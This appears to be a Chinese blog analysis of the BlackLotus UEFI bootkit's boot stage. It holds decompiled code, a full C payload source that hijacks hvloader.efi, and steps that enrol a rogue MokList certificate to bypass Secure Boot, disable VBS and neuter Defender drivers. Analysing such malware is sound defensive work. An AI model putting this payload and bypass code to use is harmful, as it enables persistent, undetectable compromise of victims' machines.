BlackLotus 分析2--boot-内核阶段
BlackLotus 分析2--boot-内核阶段
[BlackLotus 分析1--安装器阶段](BlackLotus 分析1--安装器阶段 - DirWangK - 博客园 (cnblogs.com))
LegacyBIOS→MBR→“活动的主分区”→\bootmgr→\Boot\BCD→\Windows\system32\winload.exe
UEFIBIOS→EFI系统分区(FAT格式的分区)→\efi\Microsoft\boot\bootmgfw.efi→efi\Microsoft\BCD→\Windows\system32\winload.efi
bootmgfw.efi
esp \EFI\Microsoft\Boot\bootmgfw.efi(official_bootmgfw_data 写入)
系统重启后,bootmgfw.efi加载bcd 通过\EFI\Microsoft\Boot\tmp (bcd_setup0)
// Windows Boot Manager
// --------------------
// identifier {9dea862c-5cdd-4e70-acc1-f32b344d4795}
// description Windows Boot Manager
// locale en-US
// inherit {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
// bootdebug No
// displayorder {527f84fc-036e-11ec-abb0-005056c00008}
// timeout 30
// Windows Boot Loader
// -------------------
// identifier {527f84fc-036e-11ec-abb0-005056c00008}
// device boot
// path \system32\bootmgr.efi
// description RIP the woo
// locale en-US
// inherit {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
// avoidlowmemory 0x10000000
// bootdebug No
// isolatedcontext Yes
// custom:22000023 \system32\bcd
// ems Yes
引导esp \system32\bootmgr.efi(official_bootmgr_data写入)
启动esp \system32\BCD(bcd_exp)
// Windows Boot Manager
// --------------------
// identifier {9dea862c-5cdd-4e70-acc1-f32b344d4795}
// description Windows Boot Manager
// locale en-US
// inherit {7ea2e1ac-2e61-4728-aaa3-896d9d0a9f0e}
// bootdebug Yes
// displayorder {57e1b615-0355-11ec-abb0-005056c00008}
// timeout 30
// Windows Boot Loader
// -------------------
// identifier {57e1b615-0355-11ec-abb0-005056c00008}
// device boot
// path \system32\hvloader.efi
// description Hoy la disco se flota
// locale en-US
// inherit {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
// truncatememory 0x10000000
// avoidlowmemory 0x1000
// nointegritychecks Yes
// testsigning Yes
// isolatedcontext Yes
// osdevice boot
// systemroot \
// ems Yes
hvloader
使用esp \system32\hvloader.efi 进行引导
利用esp \system32\mcupdate_AuthenticAMD.dll或esp \system32\mcupdate_GenuineIntel.dll
mcupdate_xx.dll
hvloader 通过BtLoadUpdateDll-->BtpLayoutImage 加载
NTSTATUS __stdcall __noreturn DriverEntry(_DRIVER_OBJECT *DriverObject, char **argv)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// UpdateLockPagableCodeSection = argv[1];
// UpdateLockPagableDataSection = argv[2];
// UpdateLockPagableSectionByHandle = argv[3];
// UpdateUnlockPagableImageSection = argv[4];
ptr = argv[3];
MokInstallEfiAppNtHeader = (EFI_IMAGE_NT_HEADERS64 *)((char *)&gMokInstallEfiApp_180003000 + ntheader_18000303C);
ImageBuffer = 0i64;
HvloaderImageBase = (__int64)(ptr + 0xAE48);
if ( HvloaderImageBase )
{
while ( *(_BYTE *)HvloaderImageBase != 0x4D
|| *(_BYTE *)(HvloaderImageBase + 1) != 0x5A
|| *(_BYTE *)(HvloaderImageBase + 2) != 0x90
|| *(_BYTE *)(HvloaderImageBase + 4) != 3 )
{
if ( !--HvloaderImageBase )
goto LABEL_23;
}
// DWORD CheckSum 967518d->EC35Eh 148h->f0h+58h 4h
if ( *(_DWORD *)(*(int *)(HvloaderImageBase + 0x3C) + HvloaderImageBase + 0x58) == 0xEC35E )
{
EfiImageHandle = *(_QWORD *)(HvloaderImageBase + 0x113670);// EfiImageHandle_ptr
BlpArchSwitchContext = HvloaderImageBase + 0xC550;// BlpArchSwitchContext
if ( EfiImageHandle )
{
EfiST = *(_QWORD *)(HvloaderImageBase + 0x1136C8);// EfiST
if ( EfiST )
{
// EFI_STATUS EFIAPI BlImgAllocateImageBuffer(VOID **imageBuffer, UINTN imageSize, UINT32 memoryType, UINT32 attributes, VOID *unused, UINT32 flags);
if ( ((int (__fastcall *)(__int64 *, _QWORD, __int64, __int64, _DWORD, char))(HvloaderImageBase + 0x3CC0C))(// BlImgAllocateImageBuffer
&ImageBuffer,
MokInstallEfiAppNtHeader->OptionalHeader.SizeOfImage,
0xE0000012i64,
0x424000i64,
0,
1) >= 0 )
{
ImageBuffer1 = ImageBuffer;
if ( ImageBuffer )
{
// copy NtHeader
for ( i = 0i64; i < MokInstallEfiAppNtHeader->OptionalHeader.SizeOfHeaders; ImageBuffer1 = ImageBuffer )
{
*(_BYTE *)(i + ImageBuffer1) = *((_BYTE *)&gMokInstallEfiApp_180003000 + i);
++i;
}
index = 0;
// copy section
for ( offset = (__int64)MokInstallEfiAppNtHeader
+ MokInstallEfiAppNtHeader->FileHeader.SizeOfOptionalHeader;
index < MokInstallEfiAppNtHeader->FileHeader.NumberOfSections;
++index )
{
// DWORD Signature -->size 4
// struct IMAGE_FILE_HEADER FileHeader -->size 0x14
// typedef struct _IMAGE_SECTION_HEADER {
// BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
// union {
// DWORD PhysicalAddress;
// DWORD VirtualSize;//+8
// } Misc;
// DWORD VirtualAddress;
// DWORD SizeOfRawData;
// DWORD PointerToRawData;
// DWORD PointerToRelocations;
// DWORD PointerToLinenumbers;
// WORD NumberOfRelocations;
// WORD NumberOfLinenumbers;
// DWORD Characteristics;
// } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
// (DWORD Signature -->size 4+IMAGE_FILE_HEADER FileHeader -->size 0x14))==18h
// +18h-->IMAGE_SECTION_HEADER
// +28h-->DWORD SizeOfRawData
if ( *(_DWORD *)(offset + 0x28i64 * index + 0x28) )// SizeOfRawData
{
v12 = ImageBuffer1 + *(unsigned int *)(offset + 0x28i64 * index + 0x24);// VirtualAddress
v13 = (_BYTE *)v12;
v14 = (char *)&gMokInstallEfiApp_180003000 + *(unsigned int *)(offset + 0x28i64 * index + 0x2C) - v12;// PointerToRawData
do
{
*v13 = v13[(_QWORD)v14];
++v13;
}
while ( (unsigned __int64)&v13[-v12] < *(unsigned int *)(offset + 0x28i64 * index + 0x28) );
ImageBuffer1 = ImageBuffer;
}
}
if ( MokInstallEfiAppNtHeader->OptionalHeader.AddressOfEntryPoint )
((void (__fastcall *)(__int64, __int64, __int64))(ImageBuffer1
+ MokInstallEfiAppNtHeader->OptionalHeader.AddressOfEntryPoint))(
EfiImageHandle,
EfiST,
BlpArchSwitchContext);
}
}
}
}
}
}
while ( 1 )
LABEL_23:
;
}
mcupdate_xx Payload src
#include <windows.h>
#include <winternl.h>
#define EFIAPI __cdecl
#define MEMCPY(Dest, Src, Length) for(UINT64 i = 0; i < (Length); i++) Dest[i] = Src[i];
//Defines taken from https://github.com/btbd/umap/
#define BL_MEMORY_TYPE_APPLICATION (0xE0000012)
#define BL_MEMORY_ATTRIBUTE_RWX (0x424000)
typedef enum E_EXECUTION_CONTEXT
{
ApplicationContext,
FirmwareContext
}EXECUTION_CONTEXT, *PEXECUTION_CONTEXT;
typedef DWORD64 EFI_STATUS;
typedef void(EFIAPI *BLP_ARCH_SWITCH_CONTEXT)(EXECUTION_CONTEXT newContext);
typedef NTSTATUS(EFIAPI *BL_IMG_ALLOCATE_IMAGE_BUFFER)(PVOID *imageBuffer, INT64 imageSize, INT32 memoryType, INT32 attributes, INT32 unused, BOOLEAN flags);
typedef EFI_STATUS(EFIAPI *BOOT_ENTRY)(PVOID imageHandle, PVOID systemTable, BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext);
//This buffer contains the unmapped EFI image we want to run. The code below assumes that this image has no relocations (use subsystem EFI_APPLICATION).
BYTE efiApp[] = { 0x4D, 0x5A };
//Entry point for mcupdate_*.dll
DWORD McUpdateEntry(PVOID *functionTableOut, PVOID *functionTableIn)
{
BOOT_ENTRY entry;
BL_IMG_ALLOCATE_IMAGE_BUFFER fpBlImgAllocateImageBuffer;
BLP_ARCH_SWITCH_CONTEXT fpBlpArchSwitchContext;
PIMAGE_DOS_HEADER hvDosHeader, efiDosHeader = (PIMAGE_DOS_HEADER)efiApp;
PIMAGE_NT_HEADERS hvNtHeaders, efiNtHeaders = (PIMAGE_NT_HEADERS)(efiApp + efiDosHeader->e_lfanew);
PIMAGE_SECTION_HEADER secHeader, section;
PBYTE imageBuffer = NULL, src, dest;
PVOID hvLoaderAddr, printProc, hvLoaderBase = NULL, efiSystemTable, efiImageHandle;
DWORD64 imageSize = efiNtHeaders->OptionalHeader.SizeOfImage;
//1. Get EFI system table, image handle and the start addresses of BlpArchSwitchContext, BlImgAllocateImageBuffer by offset from hvloader.efi
hvLoaderAddr = functionTableIn[3]; //This contains an address within hvloader.efi
printProc = (PVOID)((DWORD_PTR)hvLoaderAddr + 0xAE48); //This can be used to print text from application context
for (PBYTE searchAddr = printProc; searchAddr; searchAddr--) //Search for the nearest MZ header (which is guaranteed to belong to hvloader.efi).
{
if (searchAddr[0] == 'M' && searchAddr[1] == 'Z' && searchAddr[2] == 0x90 && searchAddr[4] == 0x03)
{
hvLoaderBase = searchAddr;
break;
}
}
if (!hvLoaderBase)
goto Done;
hvDosHeader = (PIMAGE_DOS_HEADER)hvLoaderBase;
hvNtHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)hvLoaderBase + hvDosHeader->e_lfanew);
if (hvNtHeaders->OptionalHeader.CheckSum != 0xEC35E) //It's better to have one check too much than too few
goto Done;
fpBlImgAllocateImageBuffer = (BL_IMG_ALLOCATE_IMAGE_BUFFER)((DWORD_PTR)hvLoaderBase + 0x3CC0C);
fpBlpArchSwitchContext = (PVOID)((DWORD_PTR)hvLoaderBase + 0xC550);
efiImageHandle = *(PVOID *)((DWORD_PTR)hvLoaderBase + 0x113670);
efiSystemTable = *(PVOID *)((DWORD_PTR)hvLoaderBase + 0x1136C8);
//2. Allocate 1:1 PA-VA buffer
if (!NT_SUCCESS(fpBlImgAllocateImageBuffer(&imageBuffer, imageSize, BL_MEMORY_TYPE_APPLICATION, BL_MEMORY_ATTRIBUTE_RWX, 0, 0b00000001)))
goto Done;
if (!imageBuffer)
goto Done;
//3. Copy headers
MEMCPY(imageBuffer, efiApp, efiNtHeaders->OptionalHeader.SizeOfHeaders);
//4. Map sections
secHeader = (PIMAGE_SECTION_HEADER)((UINT64)&efiNtHeaders->OptionalHeader + efiNtHeaders->FileHeader.SizeOfOptionalHeader);
for (WORD i = 0; i < efiNtHeaders->FileHeader.NumberOfSections; i++)
{
section = &secHeader[i];
if (section->SizeOfRawData)
{
dest = (PVOID)(imageBuffer + section->VirtualAddress);
src = (PVOID)(efiApp + section->PointerToRawData);
MEMCPY(dest, src, section->SizeOfRawData);
}
}
//5. Call entry point
if (efiNtHeaders->OptionalHeader.AddressOfEntryPoint)
{
/*
* We use a custom entry point to pass the address of BlpArchSwitchContext to our EFI application.
* Before it can call EFI services, it needs to call BlpArchSwitchContext with 'FirmwareContext' as argument (and revert this before returning).
*/
entry = (BOOT_ENTRY)(imageBuffer + efiNtHeaders->OptionalHeader.AddressOfEntryPoint);
entry(efiImageHandle, efiSystemTable, fpBlpArchSwitchContext);
}
Done:
while (1); //We don't want to return to the calling boot application
return 0;
}
MokInstallEfiApp
1、恢复bcd
2、设置启动管理器
esp \EFI\Microsoft\Boot\bootload.efi(Legitimate Microsoft-signed shim binary写入)作为Windows默认启动管理器-->bootmgfw
3、设置MokList 变量,
使自签名esp \EFI\Microsoft\Boot\grubx64.efi(bootkit)绕过 UEFI Secure Boot
4、清理文件
"system32\hvloader.efi";
"system32\bootmgr.efi";
"system32\BCD";
"system32\mcupdate_AuthenticAMD.dll";
"system32\mcupdate_GenuineIntel.dll";
5、重启
EFI_STATUS __fastcall ModuleEntryPoint(
EFI_HANDLE ImageHandle,
EFI_SYSTEM_TABLE *SystemTable,
void *BlpArchSwitchContext)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
RuntimeServices = SystemTable->RuntimeServices;
// https://uefi.org/specs/UEFI/2.10/32_Secure_Boot_and_Driver_Signing.html#efi-signature-data
v4 = (__int64)&EFI_CERT_X509_GUID;
BootServices = SystemTable->BootServices;
v6 = 0i64;
v8 = (__int64)Data;
v10 = 0;
v11 = 6i64;
do
{
v12 = *(_OWORD *)(v4 + 0x10);
*(_OWORD *)v8 = *(_OWORD *)v4;
v13 = *(_OWORD *)(v4 + 0x20);
*(_OWORD *)(v8 + 0x10) = v12;
v14 = *(_OWORD *)(v4 + 0x30);
*(_OWORD *)(v8 + 0x20) = v13;
v15 = *(_OWORD *)(v4 + 0x40);
*(_OWORD *)(v8 + 0x30) = v14;
v16 = *(_OWORD *)(v4 + 0x50);
*(_OWORD *)(v8 + 0x40) = v15;
v17 = *(_OWORD *)(v4 + 0x60);
*(_OWORD *)(v8 + 0x50) = v16;
v18 = *(_OWORD *)(v4 + 0x70);
v4 += 0x80i64;
*(_OWORD *)(v8 + 0x60) = v17;
v8 += 0x80i64;
*(_OWORD *)(v8 - 0x10) = v18;
--v11;
}
while ( v11 ); // 6*8==48
v19 = *(_WORD *)(v4 + 0x50);
v20 = *(_OWORD *)(v4 + 0x10);
*(_OWORD *)v8 = *(_OWORD *)v4;
v21 = *(_OWORD *)(v4 + 0x20);
*(_OWORD *)(v8 + 0x10) = v20;
v22 = *(_OWORD *)(v4 + 0x30);
*(_OWORD *)(v8 + 0x20) = v21;
v23 = *(_OWORD *)(v4 + 0x40);
*(_OWORD *)(v8 + 0x30) = v22;
*(_OWORD *)(v8 + 0x40) = v23; // 5
*(_WORD *)(v8 + 0x50) = v19; // 3byte
*(_BYTE *)(v8 + 0x52) = *(_BYTE *)(v4 + 0x52);
// 1-->FirmwareExecutionContext
// other-->ApplicationExecutionContext
((void (__fastcall *)(__int64))BlpArchSwitchContext)(1i64);
root = OpenVolume_180001000(ImageHandle, BootServices);
root1 = root;
if ( root )
{
if ( copy_file_18000124C( // 恢复bcd
root,
BootServices,
(CHAR16 *)L"EFI\\Microsoft\\Boot\\BCDR",
(CHAR16 *)L"EFI\\Microsoft\\Boot\\BCD")
&& copy_file_18000124C(
root1,
BootServices,
(CHAR16 *)L"EFI\\Microsoft\\Boot\\bootload.efi",// esp \EFI\Microsoft\Boot\bootload.efi(Legitimate Microsoft-signed shim binary写入)作为Windows默认启动管理器-->bootmgfw
(CHAR16 *)L"EFI\\Microsoft\\Boot\\bootmgfw.efi") )// shim 会加载esp \EFI\Microsoft\Boot\grubx64.efi(bootkit写入)
// 进而实现bootkit的持久化
{
// #define EFI_VARIABLE_NON_VOLATILE 0x00000001
// #define EFI_VARIABLE_BOOTSERVICE_ACCESS 0x00000002
v6 = RuntimeServices->SetVariable((CHAR16 *)L"MokList", &VendorGuid, 3u, 0x353ui64, Data);// 设置MokList,将bootkit签名加入
// .rdata:0000000180002210 EFI_CERT_X509_GUID dd 0A5C059A1h ; SignatureType.Data1
// .rdata:0000000180002210 ; DATA XREF: _ModuleEntryPoint+1F↑o
// .rdata:0000000180002210 dw 94E4h ; SignatureType.Data2
// .rdata:0000000180002210 dw 4AA7h ; SignatureType.Data3
// .rdata:0000000180002210 db 87h, 0B5h, 0ABh, 15h, 5Ch, 2Bh, 0F0h, 72h; SignatureType.Data4
// .rdata:0000000180002210 dd 353h ; SignatureListSize
// .rdata:0000000180002210 dd 0 ; SignatureHeaderSize
// .rdata:0000000180002210 dd 337h ; SignatureSize
// .rdata:000000018000222C ; EFI_SIGNATURE_DATA
// .rdata:000000018000222C dd 605DAB50h ; SignatureOwner.Data1 ; GRUB_EFI_SHIM_LOCK_GUID
// .rdata:000000018000222C dw 0E046h ; SignatureOwner.Data2
// .rdata:000000018000222C dw 4300h ; SignatureOwner.Data3
// .rdata:000000018000222C db 0ABh, 0B6h, 3Dh, 0D8h, 10h, 0DDh, 8Bh, 23h; SignatureOwner.Data4
// SignatureData-->
// (openssl x509 -noout -text -in 0x18000223C.crt)
// Certificate:
// Data:
// Version: 3 (0x2)
// Serial Number:
// 57:0b:5d:22:b7:23:b4:a4:42:cc:6e:ee:bc:25:80:e8
// Signature Algorithm: sha1WithRSAEncryption
// Issuer: CN = When They Cry CA
// Validity
// Not Before: Aug 13 17:48:44 2022 GMT
// Not After : Aug 13 17:58:44 2032 GMT
// Subject: CN = When They Cry CA
// Subject Public Key Info:
// Public Key Algorithm: rsaEncryption
// Public-Key: (2048 bit)
// Modulus:
// 00:c7:bb:2e:e9:59:5f:b9:ee:42:46:65:c9:45:c6:
// e7:1d:a4:a9:5b:d6:12:11:a8:95:2b:29:5c:c0:52:
// c6:29:ce:62:e1:97:78:6d:04:79:58:a5:29:ec:50:
// 5a:f8:16:eb:dc:37:f4:24:98:a0:8e:e1:cd:b1:48:
// 2c:cc:e9:42:89:ef:7c:44:8a:97:e3:55:9a:58:2a:
// bc:aa:cb:0e:ca:27:07:27:9d:b4:9e:3e:7f:85:2d:
// 2c:72:0c:16:b6:11:ae:6f:9b:e5:81:c0:d7:78:c2:
// 3c:87:b1:88:d7:3b:93:4c:df:15:eb:9e:de:97:d2:
// 13:80:25:58:69:d7:73:c5:c6:62:74:54:da:a3:8d:
// 7d:23:0f:da:2f:4c:c9:5b:54:49:63:e4:85:cc:4e:
// 71:da:32:1a:44:69:1a:7d:f5:22:ef:5a:3e:d6:ed:
// 17:74:4d:ee:6f:9e:a3:56:63:65:91:3e:d7:4d:70:
// 32:32:51:a3:f9:03:0e:6e:48:51:5d:99:60:d5:02:
// 4c:d8:80:de:c9:da:ce:f9:b5:5c:f5:36:74:e9:96:
// 9a:21:9a:67:c4:91:cc:a5:8b:49:71:0f:d7:c4:77:
// eb:30:01:46:37:19:ea:04:18:47:71:80:73:eb:89:
// 9f:d6:9f:b0:38:2b:eb:bb:f8:78:25:90:af:74:14:
// 55:dd
// Exponent: 65537 (0x10001)
// X509v3 extensions:
// X509v3 Key Usage: critical
// Digital Signature
// X509v3 Extended Key Usage:
// Code Signing
// X509v3 Subject Alternative Name:
// DNS:When They Cry CA
// X509v3 Subject Key Identifier:
// 60:BC:4A:39:DC:22:08:6C:9D:12:E3:E7:B4:4A:01:AC:0C:61:79:FF
// Signature Algorithm: sha1WithRSAEncryption
// Signature Value:
// b7:46:56:4f:05:58:1a:5f:7f:0e:64:01:2a:ae:b6:71:94:26:
// 3d:2d:4f:3d:0a:14:34:48:b5:86:ee:1e:99:58:a8:8e:35:c7:
// b6:59:32:2a:c4:5b:01:04:e2:e2:d4:ec:74:20:34:65:2e:b4:
// c4:02:b8:c7:2f:16:17:bf:61:96:62:a1:13:02:97:3f:61:f2:
// 75:e2:36:cf:58:d4:06:f3:b1:34:b6:e5:3c:0f:a5:85:64:6d:
// 90:16:76:89:c2:30:22:ab:ba:73:a1:39:78:3e:a1:ce:d9:d2:
// 0d:2f:ef:aa:5d:b1:93:40:4f:be:dd:34:4d:68:07:bd:5d:53:
// 1d:b2:df:d4:08:05:2e:df:b1:bc:ec:cb:75:9d:da:a9:92:e0:
// 6d:92:df:b2:d7:1b:67:2b:a8:b8:06:9e:3a:98:a3:8b:1e:35:
// d2:15:60:13:a5:79:ff:55:d1:4c:e7:10:a8:31:4f:73:ca:e5:
// fa:10:e4:42:38:5d:29:96:5c:3d:f2:c2:2b:6a:21:4c:6d:e4:
// 29:4a:a6:3f:64:df:c2:88:27:39:09:a4:03:fd:c4:68:21:57:
// b9:b3:da:61:3e:89:e1:dc:b4:49:30:f8:26:eb:15:ca:63:a6:
// 8c:d5:aa:f2:de:3e:fc:45:dc:fd:a3:9a:5e:8b:d3:36:b3:fa:
// 80:98:31:76
v10 = 1;
// 删除文件
Delete_1800010DC(root1, BootServices, (CHAR16 *)L"system32\\hvloader.efi");
Delete_1800010DC(root1, BootServices, (CHAR16 *)L"system32\\bootmgr.efi");
Delete_1800010DC(root1, BootServices, (CHAR16 *)L"system32\\BCD");
Delete_1800010DC(root1, BootServices, (CHAR16 *)L"system32\\mcupdate_AuthenticAMD.dll");
Delete_1800010DC(root1, BootServices, (CHAR16 *)L"system32\\mcupdate_GenuineIntel.dll");
}
((void (__fastcall *)(EFI_FILE_PROTOCOL *))root1->Close)(root1);
if ( v10 )
// EfiResetCold冷重启,将系统所有电路设为初始状态,相当于断电再重新通电
// void (*ResetSystem)(
// enum EFI_RESET_TYPE ResetType,
// /* 进行重启/关机的类型 */
// unsigned long long ResetStatus,
// /* 状态码, 正常的电源操作应为EFI_SUCCESS
// * 因错误导致的为实际错误码
// * 这里我们设为EFI_SUCCESS(0) */
// unsigned long long DataSize,
// /* ResetData的大小
// * 这里我们由于不使用ResetData, 把它设为0 */
// void *ResetData
// /* 当ResetType为EfiResetCold、EfiResetWarm或是EfiResetShutdown时
// * 是一个空字符结尾的Unicode字符串, 后面可接可选的二进制内容
// * 用来表示重启的原因等信息
// * 当ResetType为EfiResetPlatformSpecific时
// * 是一个以空字符结尾的Unicode字符串, 其后接一个EFI_GUID表示重启类型
// * 可使用启类型的EFI_GUID是平台定义的
// * 这里我们不使用, 将它设为NULL */
// );
RuntimeServices->ResetSystem(EfiResetCold, EFI_SUCCESS, 0i64, 0i64);
}
((void (__fastcall *)(_QWORD))BlpArchSwitchContext)(0i64);// ApplicationExecutionContext
return v6;
}
grubx64-->bootkit
当前bootmgfw (实际为shim)将引导grubx64.efi,即BlackLotus的bootkit
EFI_STATUS __fastcall ModuleEntryPoint(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable)
{
DisableVbs_180002AC0(SystemTable->RuntimeServices);// VbsPolicyDisabled
gEfiSystemTable = SystemTable;
gEfiBootServices = SystemTable->BootServices;
if ( !(unsigned int)PatchBootManager_180002038(ImageHandle, SystemTable->BootServices) )
SystemTable->RuntimeServices->ResetSystem(EfiResetShutdown, 0xFFFFFFFFFFFFFFFFui64, 0i64, 0i64);
return 0i64;
}
DisableVbs_180002AC0
EFI_STATUS __fastcall DisableVbs_180002AC0(EFI_RUNTIME_SERVICES *a1)
{
CHAR16 *v2; // rax
int Data; // [rsp+40h] [rbp+8h] BYREF
// https://github.com/Mattiwatti/EfiGuard/blob/master/EfiGuardDxe/PatchWinload.c
// VbsPolicyDisabled
v2 = deobfuscate_wstring((WORD *)&word_180004090, 0x12u, 1);
Data = 1;
return a1->SetVariable(v2, &VendorGuid, 3u, 4ui64, &Data);
}
PatchBootManager_180002038
grubx64.efi(bootkit) PatchBootManager
-
LoadImage EFI\Microsoft\Boot\winload.efi
EFI\Microsoft\Boot\winload.efi-->原始esp \EFI\Microsoft\Boot\bootmgfw.efi
后续会加载原始BCD,使用\Windows\system32\winload.efi引导系统
-
hook EFI\Microsoft\Boot\winload.efi 中的 ImgArch[Efi]StartBootApplication
-
-
在ImgArch[Efi]StartBootApplication的hook函数中对\Windows\system32\winload.efi进行patch
-
PatchWinload BlImgAllocateImageBuffer
分配mapper_hk(MZ魔术字改为HK的PE文件) 内存
-
PatchWinload OslArchTransferToKernel
patch WdFilter.sys and WdBoot.sys EntryPoint-->ret
get disk.sys EntryPoint, load mapper_hk
-
__int64 __fastcall PatchBootManager_180002038(EFI_HANDLE ParentImageHandle, EFI_BOOT_SERVICES *BS)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
error = 0;
Handle = 0i64;
if ( (BS->HandleProtocol(ParentImageHandle, &EFI_LOADED_IMAGE_PROTOCOL_GUID, (void **)&EfiLoadedImageProtocol) & 0x8000000000000000ui64) == 0i64 )
{
// EFI\Microsoft\Boot\winload.efi-->shim
path = deobfuscate_wstring((WORD *)&ws, 0x1Fu, 1);
filepath = (FILEPATH_DEVICE_PATH *)FileDevicePath_180002B14(EfiLoadedImageProtocol->DeviceHandle, path);
if ( filepath )
{
v7 = BS->LoadImage(1u, ParentImageHandle, &filepath->Header, 0i64, 0i64, &Handle);
if ( v7 >= 0 )
{
if ( (unsigned int)anti_debug_rdtsc() )
OutputLogo_180002A08();
if ( (BS->HandleProtocol(Handle, &EFI_LOADED_IMAGE_PROTOCOL_GUID, (void **)&LoadedImage) & 0x8000000000000000ui64) == 0i64 )
{
PeFileVersionInfo_BuildNumber_180002538 = GetPeFileVersionInfo_BuildNumber_180002538((__int64)LoadedImage->ImageBase);
if ( PeFileVersionInfo_BuildNumber_180002538 >= 7600 )
{
HookAddress = HookedBootmgfwImgArchStartBootApplication_Eight_180001D80;
if ( PeFileVersionInfo_BuildNumber_180002538 < 9200 )
HookAddress = HookedBootmgfwImgArchEfiStartBootApplication_Vista_180001D48;
// // Signature for [bootmgfw|bootmgr]!ImgArch[Efi]StartBootApplication
// mov r8d, 0xD0000009
Pattern_180002F68 = FindPattern_180002F68(
(_BYTE *)LoadedImage->ImageBase,
SigImgArchStartBootApplication_180004040,
6u);
if ( Pattern_180002F68 )
{
SigImgArchStartBootApplication = BacktrackToFunctionStart_180002398(
(__int64)LoadedImage->ImageBase,
(__int64)Pattern_180002F68);
if ( SigImgArchStartBootApplication )
{
Tpl = BS->RaiseTPL(TPL_HIGH_LEVEL);
HookJmp_180002A60((_BYTE *)SigImgArchStartBootApplication, (__int64)HookAddress, hookbackup_180015C78);
BS->RestoreTPL(Tpl);
}
}
}
}
}
BS->FreePool(filepath);
if ( v7 >= 0 )
{
if ( (BS->StartImage(Handle, 0i64, 0i64) & 0x8000000000000000ui64) != 0i64 )
BS->UnloadImage(Handle);
else
return 1;
}
}
}
return error;
}
FileDevicePath_180002B14
void *__fastcall FileDevicePath_180002B14(EFI_HANDLE Handle, WORD *path)
{
void *v3; // rdi
unsigned int pathnullend_size; // esi
FILEPATH_DEVICE_PATH *FileDevicePath; // [rsp+50h] [rbp+30h] BYREF
EFI_DEVICE_PATH_PROTOCOL *EfiDevicePathProtocol; // [rsp+58h] [rbp+38h] BYREF
v3 = 0i64;
FileDevicePath = 0i64;
// EFI\Microsoft\Boot\winload.efi
pathnullend_size = 2 * wcslen_18000297C(path) + 2;
if ( (gEfiBootServices->HandleProtocol(Handle, &EFI_DEVICE_PATH_PROTOCOL_GUID, (void **)&EfiDevicePathProtocol) & 0x8000000000000000ui64) == 0i64
&& (gEfiBootServices->AllocatePool(EfiLoaderData, pathnullend_size + 8, (void **)&FileDevicePath) & 0x8000000000000000ui64) == 0i64 )
{
memset_180001000(FileDevicePath, 0, pathnullend_size + 8);
FileDevicePath->Header.Type = 4; // #define MEDIA_DEVICE_PATH 0x04
FileDevicePath->Header.SubType = 4; // ///
// /// File Path Media Device Path SubType
// ///
// #define MEDIA_FILEPATH_DP 0x04
*(_WORD *)FileDevicePath->Header.Length = pathnullend_size + 4;
strcpy_180001024(FileDevicePath->PathName, (__int64)path, pathnullend_size);
// ///
// /// File Path Media Device Path SubType
// ///
// #define MEDIA_FILEPATH_DP 0x04
// typedef struct {
// EFI_DEVICE_PATH_PROTOCOL Header;
// ///
// /// A NULL-terminated Path string including directory and file names.
// ///
// CHAR16 PathName[1];
// } FILEPATH_DEVICE_PATH;
// EFI_DEVICE_PATH_PROTOCOL endPath = {0x7F, 0xFF, 0x0004};
*(EFI_DEVICE_PATH_PROTOCOL *)((char *)&FileDevicePath->Header + *(unsigned __int16 *)FileDevicePath->Header.Length) = (EFI_DEVICE_PATH_PROTOCOL)0x4FF7F;// unknow
v3 = ConvertTextToDevicePath_180002C28(EfiDevicePathProtocol, FileDevicePath);
}
if ( FileDevicePath )
gEfiBootServices->FreePool(FileDevicePath);
return v3;
}
//????
void *__fastcall ConvertTextToDevicePath_180002C28(EFI_DEVICE_PATH_PROTOCOL *a1, FILEPATH_DEVICE_PATH *a2)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v14 = a1;
Buffer = 0i64;
v15 = (EFI_DEVICE_PATH_PROTOCOL)0x4017F;
v16 = (EFI_DEVICE_PATH_PROTOCOL)0x4FF7F; // EFI_DEVICE_PATH_PROTOCOL endPath = {0x7F, 0xFF, 0x0004};
v4 = DevicePathSize_180002D8C(a1);
v5 = PxepDevicePathInstanceCount(a1);
v6 = DevicePathSize_180002D8C(&a2->Header);
v12 = v6 + v4 * v5;
if ( (gEfiBootServices->AllocatePool(EfiLoaderData, v12, &Buffer) & 0x8000000000000000ui64) == 0i64 )
{
for ( i = (EFI_DEVICE_PATH_PROTOCOL *)Buffer; ; i = v9 + 1 )
{
v10 = efi_devpath_last_node_180002D10(&v14, &v12);
if ( !v10 )
break;
strcpy_180001024(i, (__int64)v10, v12);
v8 = &i->Type + v12;
strcpy_180001024(v8, (__int64)a2, v6);
v9 = (EFI_DEVICE_PATH_PROTOCOL *)&v8[v6];
strcpy_180001024(v9, (__int64)&v15, 4i64);
}
strcpy_180001024(&i[0xFFFFFFFF].Type, (__int64)&v16, 4i64);
}
return Buffer;
}
//????
EFI_DEVICE_PATH_PROTOCOL *__fastcall efi_devpath_last_node_180002D10(
EFI_DEVICE_PATH_PROTOCOL **start,
_QWORD *node_size)
{
EFI_DEVICE_PATH *next; // r8
EFI_DEVICE_PATH_PROTOCOL *last; // r9
EFI_DEVICE_PATH_PROTOCOL *first; // rbx
unsigned int i; // er10
__int64 ptr; // rax
bool v7; // zf
next = *start;
last = 0i64;
first = *start;
if ( *start )
{
for ( i = 0; ; ++i )
{
// #define IsDevicePathEndType(a) ( DevicePathType(a) == END_DEVICE_PATH_TYPE )
// #define IsDevicePathEndSubType(a) ( (a)->SubType == END_ENTIRE_DEVICE_PATH_SUBTYPE )
// #define IsDevicePathEnd(a) ( IsDevicePathEndType(a) && IsDevicePathEndSubType(a) )
ptr = (__int64)&next->SubType;
if ( (next->Type & 0x7F) == END_DEVICE_PATH_TYPE )// IsDevicePathEndType
{
